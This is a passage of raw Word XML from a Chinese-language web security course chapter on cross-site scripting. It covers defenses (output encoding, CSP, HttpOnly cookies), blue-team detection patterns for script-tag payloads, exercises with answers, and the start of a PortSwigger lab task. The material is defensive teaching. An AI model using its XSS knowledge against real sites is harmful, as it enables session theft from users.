      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">没有此问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">🛡 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：蓝队检测与修复（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每掌握一种攻击方式，必须立刻对应其防御。以下各措施构成纵深防御体系，不可单依赖一项。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">输出编码（上下文感知转义）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在将用户输入插入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之前，依据插入的精确上下文进行编码。例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">元素内容：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;lt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性值：除字符转义外，务必使用引号包围属性值，并转义相应引号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串内部：进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转义，预处理反斜杠。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询参数：进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">百分比编码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代模板引擎（Jinja2、Thymeleaf、React</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）默认对变量进行适合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上下文的自动转义。开发人员应避免使用“原始</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML”插入函数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），除非数据来源绝对可信并经过严格净化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内容安全策略（Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Policy，CSP）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应头</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">告知浏览器允许加载哪些来源的脚本。严格的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以禁止内联脚本执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">script-src 'self'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）并禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使攻击者即便注入了脚本标签也无法执行。CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不是防</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的银弹，但可作为强有力的额外层。实施时需配合报告模式（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">report-uri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">report-to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）持续监控违规情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性，使其无法通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取。这能缓解攻击者利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">窃取会话凭证的风险，但对其他危害（如钓鱼、请求伪造）无效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全框架与库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：优先使用成熟的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架，其模板引擎通常默认输出编码。禁止将用户输入拼接到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的敏感</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sink </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中。使用前端框架时，避免绕过安全机制的内置方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF（Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用防火墙）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可基于模式匹配检测常见的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击向量（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、事件处理器等）。但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不能替代源码修复，且可能存在绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的报告端点，收集违规报告，可以发现潜在的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入尝试或现有的漏洞利用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：审查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器日志中出现的异常编码参数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%3Cscript%3E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），结合上下文研判是否为攻击行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自动化漏洞扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在测试流程中集成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DAST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP ZAP、Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描器）检测反射型和存储型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS，并配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SAST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源码分析（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeQL、Semgrep）发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型痕迹。</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10.1（提取题）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从原理层面阐述：为何输出编码能够根治</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS，而黑名单过滤通常不可靠？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反射型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与存储型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的主要区别是什么？一条攻击载荷若既能通过反射型又能沉积在数据库中，它属于哪种类型？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与其它类型的本质差异在哪里？在审查服务器日志时，为何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">往往不出现？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码明确告诉解析器“以下内容为纯文本”，从而消除了解析歧义；黑名单则永远面临变体绕过的可能。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键在于恶意脚本的最终存储位置；若脚本在服务器响应中且源数据来自数据库，则为存储型。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型完全由客户端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">location.hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等本地源，可能根本不向服务器发送恶意载荷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出编码从根本上改变了数据被浏览器解析时的“身份”，使其不可能成为标签或脚本，而黑名单只能试图枚举已知攻击模式，攻击者可用编码、大小写、语法变种轻易绕过。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反射型依赖用户点击特制链接触发，服务器直接回显参数；存储型通过持久化存储后的正常访问触发。一条既被反射又存入数据库的脚本，当其他用户访问存储该脚本的页面时即构成存储型，但首次反射回显属于反射型；通常归于存储型。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能全程留在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">片段（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#&lt;script&gt;...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），浏览器不会将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之后部分发送到服务器，服务器日志中无迹可寻。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“Cross‑site</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">scripting”实验室中，选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“DOM XSS in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sink using source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">location.search</w:t>
      </w:r>
      <w:r>
